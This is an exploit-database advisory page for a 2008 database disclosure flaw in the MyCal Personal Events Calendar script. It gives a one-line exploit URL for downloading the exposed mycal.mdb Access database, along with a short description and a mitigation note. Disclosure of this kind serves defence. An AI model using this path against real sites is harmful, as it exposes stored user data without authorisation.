header-logo
Suggest Exploit
vendor:
MyCal Personal Events Calendar
by:
CoBRa_21
7.5
CVSS
HIGH
Database Disclosure Vulnerability
200
CWE
Product Name: MyCal Personal Events Calendar
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vulnerability

MyCal Personal Events Calendar is prone to a database disclosure vulnerability because it fails to properly restrict access to the 'mycal.mdb' database file. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Mitigation:

Users should ensure that the 'mycal.mdb' database file is not accessible from the web.
Source

Exploit-DB raw data:

****************************************************************************************
MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vulnerability
****************************************************************************************
 
Script Name : MyCal Personal Events Calendar
 
Author : CoBRa_21
 
My Site : www.ipbul.org
 
Download : http://www.funscripts.net/old_coldfusion/download.php?fname=mycal
 
****************************************************************************************
 
Exploit:
 
http://localhost/[PATH]/database/mycal.mdb
 
****************************************************************************************
 
Thanks: Cyber-Warrior.Org
 
****************************************************************************************

# milw0rm.com [2008-12-11]

Navigation

Suggest Exploit

Services By CQR